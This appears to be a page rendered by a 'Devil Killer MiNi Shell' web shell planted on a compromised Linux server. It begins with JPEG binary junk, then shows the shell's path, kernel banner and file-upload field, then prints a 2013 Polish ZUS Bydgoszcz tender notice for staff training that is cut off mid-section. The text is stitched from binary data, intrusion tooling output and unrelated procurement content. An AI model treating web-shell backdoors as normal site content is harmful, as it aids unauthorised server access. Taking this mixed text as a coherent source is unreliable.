JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/168836-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Przeprowadzenie szkoleń dla pracowników Zakładu Ubezpieczeń Społecznych Oddział w Bydgoszczy w zakresie umiejętności menadżerskich oraz technik obsługi klienta</b><br>
<b>Numer ogłoszenia: 168836 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Bydgoszczy , ul. Świętej Trójcy 33, 85-224 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3418308.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla pracowników Zakładu Ubezpieczeń Społecznych Oddział w Bydgoszczy w zakresie umiejętności menadżerskich oraz technik obsługi klienta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przetarg nieograniczony poniżej 130000 euro pn Przeprowadzenie szkoleń dla pracowników Zakładu Ubezpieczeń Społecznych Oddział w Bydgoszczy w zakresie umiejętności menadżerskich oraz technik obsługi klienta
Szkolenie z umiejętności menadżerskich część pierwsza zamówienia zostanie przeprowadzone dla 76 osób
Szkolenie w zakresie technik obsługi klienta część druga zamówienia zostanie przeprowadzone dla 68 osób
Przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie
6 dwudniowych szkoleń 6 razy 2 dni razy 8 godzin dydaktycznych z zakresu umiejętności menadżerskich łącznie 96 godzin dydaktycznych
6 dwudniowych szkoleń 6 razy 2 dni razy 8 godzin dydaktycznych z zakresu technik obsługi klienta łącznie 96 godzin dydaktycznych
Zajęcia muszą być prowadzone w języku polskim
Szkolenia będą się odbywały na terenie miasta Bydgoszcz Wykonawca zapewnia odpowiednio wyposażoną salę szkoleniowo dydaktyczną umożliwiającą przeprowadzenie szkolenia w formie wykładu i warsztatowej oraz zapewniającą komfort odpowiednie oświetlenie klimatyzacja uczestnikom Wykonawca zobowiązuje się do zapewnienia materiałów potrzebnych do realizacji szkolenia np markery taśma klejąca masa mocująca flipchart wraz z papierem i wyposażenia w powyższe sali szkoleniowo dydaktycznej
Wykonawca zapewnia
materiały dydaktyczne w języku polskim
kadrę gwarantującą wysoką jakość szkolenia
zebranie od uczestników na każdym szkoleniu pierwszego i drugiego dnia podpisów na listach obecności i przekazanie list Zamawiającemu po zakończeniu szkoleń
przeprowadzenie wśród uczestników ankiety oceniającej każde szkolenie oraz opracowanie na jej podstawie raportu końcowego  przekazanie Zamawiającemu raportu w terminie 14 dni po zakończeniu ostatniego szkolenia
wystawienie certyfikatu lub zaświadczenia o ukończeniu szkolenia  oryginał dla uczestnika oraz kserokopia dla Zamawiającego w terminie 7 dni od dnia zakończenia szkolenia
w każdym dniu szkolenia 2 przerwy kawowe kawa herbata ciastka i obiad w pomieszczeniu dostosowanym do podawania posiłków znajdującym się w tym samym obiekcie co sala szkoleniowo dydaktyczna
Uczestnicy będą podzieleni na grupy maksymalne 13 osobowe Zamawiający dopuszcza możliwość skierowania mniejszej lub większej liczby osób do przeszkolenia w poszczególnych zadaniach przy czym zmiana taka nie przekroczy 10 procent liczby osób w poszczególnych zadaniach
Szkolenie winno umożliwiać przekazanie treści uczestnikom głównie w formie warsztatowej ćwiczeniowej
80 procent czasu szkolenia część warsztatowa ćwiczenia praca w podgrupach casey technologie informacyjno komunikacyjne
20 procent część wykładowa prezentacja treści teoretycznej
Program szkoleń Wykonawca ustali z Zamawiającym najpóźniej w terminie 2 dni roboczych przed rozpoczęciem pierwszego szkolenia Program szkoleń będzie uwzględniał specyfikę ZUS
Szkolenie odbywać się będzie w dni robocze w godzinach od 8 do 15
Zamawiający przedstawia wstępny harmonogram realizacji szkoleń
Szkolenie w zakresie umiejętności menadżerskich
pierwsza grupa 13 i 14 czerwca br
druga grupa 20 i 21 czerwca br
trzecia grupa 25 i 26 czerwca br
czwarta grupa 27 i 28 czerwca br
piąta grupa 26 i 27 sierpnia br
szósta grupa 29 I 30 sierpnia br
Szkolenie w zakresie technik obsługi klienta
pierwsza grupa 5 i 6 czerwca br
druga grupa 11 i 12 czerwca br
trzecia grupa 18 i 19 czerwca br
czwarta grupa 4 i 5 września br
piąta grupa 10 i 11 września br
szósta grupa 18 i 19 września br
Podane terminy są szacunkowe Zamawiający zastrzega sobie prawo zmiany terminów z przyczyn organizacyjnych
Przedmiot zamówienia finansowany będzie w całości ze środków publicznych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww warunku zostanie dokonana na podstawie oświadczenia Wykonawcy potwierdzającego spełnianie warunków określonych w art 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww warunku zostanie dokonana na podstawie oświadczenia Wykonawcy potwierdzającego spełnianie warunków określonych w art 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww warunku zostanie dokonana na podstawie oświadczenia Wykonawcy potwierdzającego spełnianie warunków określonych w art 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww warunku zostanie dokonana na podstawie
oświadczenia Wykonawcy potwierdzającego spełnianie warunków określonych w art 22 ust 1 ustawy Prawo zamówień publicznych
potwierdzenia że Wykonawca dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia
Warunek zostanie spełniony jeżeli Wykonawca wykaże, że każda osoba która będzie uczestniczyć w wykonywaniu zamówienia posiada w okresie ostatnich trzech lat przed upływem terminu składania ofert doświadczenie zawodowe w pracy dydaktycznej polegającej na prowadzeniu szkoleń z umiejętności menadżerskich lub technik obsługi klienta w ilości po 200 godzin każdy temat szkolenia oraz posiada wykształcenie wyższe
Ocena spełniania ww warunku zostanie dokonana w oparciu o wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie przedmiotowych usług wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami
Przez szkolenie Zamawiający rozumie zajęcia prowadzone w szczególności w formie wykładów warsztatów mające na celu uzyskanie uzupełnienie lub doskonalenie umiejętności i kwalifikacji zawodowych lub ogólnych potrzebnych do wykonywania pracy zarówno szkolenia otwarte dostępne dla wszystkich chętnych jak i zamknięte organizowane na potrzeby konkretnego podmiotu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww warunku zostanie dokonana na podstawie oświadczenia Wykonawcy potwierdzającego spełnianie warunków określonych w art 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 formularz oferty  z ceną załącznik nr 1 do części pierwszej SIWZ
2 pełnomocnictwo do podpisania oferty w przypadku podpisania dokumentu przez osobę (osoby) inną niż upoważniona w dokumencie rejestracyjnym
3 dokument ustanawiający pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego
6 wykaz osób które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami załącznik nr 3 do części pierwszej SIWZ Z wykazu musi wynikać że każda osoba która będzie uczestniczyć w wykonywaniu zamówienia posiada w okresie ostatnich trzech lat przed upływem terminu składania ofert doświadczenie zawodowe w pracy dydaktycznej polegającej na prowadzeniu szkoleń z umiejętności menadżerskich lub z zakresu technik obsługi klienta  w ilości po 200 godzin każdy temat szkolenia oraz posiada wykształcenie wyższe
7 w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu potencjale technicznym osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia
8 w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu potencjale technicznym osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków w celu oceny czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów wówczas wykonawca jest zobowiązany do złożenia dokumentów dotyczących
a zakresu dostępnych wykonawcy zasobów innego podmiotu
b sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę przy wykonywaniu zamówienia
c charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem
d zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia
10 w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu potencjale technicznym osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków a podmioty te będą brały udział w realizacji części zamówienia wówczas inne podmioty zobowiązane są do złożenia oświadczenia o braku podstaw do ich wykluczenia załącznik nr 5 do części pierwszej SIWZ
14 wykaz osób które będą uczestniczyć w wykonywaniu zamówienia wraz z referencjami należytego wykonania usług wymagane w ofercie  w celu poddania ocenie w ramach kryterium doświadczenie trenera załącznik nr 3a do części pierwszej siwz
15 referencje potwierdzające należyte wykonanie usług szkoleń z zakresu umiejętności menadżerskich w administracji publicznej lub technik obsługi klienta w administracji publicznej wymagane w ofercie  w celu poddania ocenie w ramach kryterium doświadczenie trenera w administracji publicznej. 
Dokumenty o których mowa w pkt 14 i 15 służą do oceny ofert w ramach kryterium oceny ofert doświadczenie nie należą do katalogu dokumentów jakich może żądać Zamawiający od Wykonawcy na podstawie art. 25 ust 1 pzp a tym samym nie podlegają przepisom art 26 ust 3 i 4 pzp i w przypadku nie załączenia ich do oferty Zamawiający nie będzie wzywał do ich uzupełnienia
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów o których mowa w pkt  III 4 3 1  zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji wykonawcy  złożone przed właściwym organem sądowym administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - doświadczenie - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy za wyjątkiem następujących sytuacji
w przypadku wystąpienia okoliczności niezależnych od woli stron których nie można było przewidzieć a w wyniku których spełnienie świadczenia określonego w umowie okazało się niemożliwe lub znacznie utrudnione
zmiana podwykonawców
zmiana zmniejszenie lub zwiększenie ilości osób do przeszkolenia nie przekraczająca 10 procent ogólnej liczby osób w tym zadaniu
zmiana terminu realizacji zamówienia zmiana harmonogramu realizacji szkolenia
Warunkiem dokonania zmian jest złożenie przez strony stosownego wniosku wraz z uzasadnieniem Wszystkie zmiany wymagają akceptacji przez obie strony umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Oddziału ZUS w Bydgoszczy ul. Świętej Trójcy 33 pokój nr 218 drugie piętro w godz od 8 do 15 lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2013 godzina 10:00, miejsce: Oferty należy składać w siedzibie ZUS Oddział w Bydgoszczy ulŚwiętej Trójcy 33 pokój 409 czwarte piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert nastąpi w dniu 16.05.2013r  o godz 10.30 w siedzibie ZUS Oddział w Bydgoszczy ul Świętej Trójcy 33 pokój nr 434 czwarte piętro
Termin realizacji zamówienia od dnia podpisania umowy nie wcześniej niż od 01.06.2013r do 30.09.2013r
Termin związania ofertą wynosi 30 dni. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert
Zamawiający nie zamierza zawrzeć umowy ramowej
Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów
Zamawiający nie przewiduje aukcji elektronicznej
Kryterium oceny ofert w każdej części zamówienia stanowi
cena brutto oferty znaczenie 80 procent
doświadczenie doświadczenie trenera i doświadczenie trenera w administracji publicznej znaczenie 20 procent
W każdej z części zostanie wybrana oferta która przedstawia najkorzystniejszy bilans ceny i doświadczenia w oparciu o następujący algorytm
O równa się  C plus D  gdzie
C równa się Cof min podzielone przez Cof bad razy 80         
O równa się suma punktów jaką uzyskał Wykonawca za oba kryteria oceny ofert
C równa się suma punktów jaką Wykonawca uzyskał za kryterium cena 
Cof min cena oferty najtańszej
Cof bad cena oferty badanej
D równa się suma punktów jakie Wykonawca uzyskał za kryterium doświadczenie 
D równa się D1 plus D2
D1 równa się ilość punktów jaką Wykonawca uzyskał za kryterium doświadczenie trenera
D2 równa się ilość punktów jaką Wykonawca uzyskał za kryterium doświadczenie trenera w administracji publicznej
D bad suma punktów oferty badanej za kryterium doświadczenie 
D max suma punktów za kryterium doświadczenie oferty która uzyskała największą ilość punktów w tym kryterium maksymalnie 100 pkt
D równa się D bad podzielone przez D max razy 20
Zamawiający przyzna punkty w kryterium doświadczenie trenera D1 w następujący sposób
Punkty za kryterium doświadczenie trenera zostaną przyznane w skali do 90 punktów na podstawie wykazu osób złożonego w celu poddania ocenie w ramach kryterium doświadczenie trenera załącznik nr 3a do części pierwszej SIWZ
Przy ocenie będzie brana pod uwagę liczba godzin szkoleniowych potwierdzona referencjami należytego wykonania usług w okresie ostatnich trzech lat przed upływem terminu składania ofert w ramach szkoleń z zakresu umiejętności menadżerskich lub technik obsługi klienta przeprowadzonych przez danego trenera z wykazu który będzie uczestniczył w wykonywaniu przedmiotowego zamówienia ponad minimum wymagane w warunku określonym w pkt 5.3 części pierwszej SIWZ
Za doświadczenie w przeprowadzaniu szkoleń z zakresu umiejętności menadżerskich lub technik obsługi klienta ponad minimum wymagane w warunku o którym mowa w pkt 5.3 części pierwszej SIWZ ponad 200 godzin Wykonawca otrzyma 3 pkt za każde dodatkowe 10 godzin szkolenia Zamawiający przyzna punkty za szkolenia mieszczące się w granicach ponad 200 a 500 godzin Maksymalnie Wykonawca w tym kryterium może uzyskać 90 punktów 
Do oceny będzie brany pod uwagę tylko załącznik nr 3a do części pierwszej SIWZ, który musi zawierać wykaz trenera którego Wykonawca wskazał w załączniku nr 3 do części pierwszej SIWZ. Ocenie będzie podlegać wyłącznie jeden trener spełniający warunek udziału w postępowaniu określony w pkt 5.3 części pierwszej  SIWZ wskazany w załączniku nr 3 do części pierwszej SIWZ W przypadku wskazania kilku trenerów w wykazie Zamawiający przyjmie do oceny trenera z najwyższym doświadczeniem
W sytuacji braku doświadczenia ponad 200 godzin Wykonawca otrzyma 0 pkt w kryterium doświadczenie trenera
Zamawiający przyzna punkty w kryterium doświadczenie trenera w administracji publicznej D2 w następujący sposób
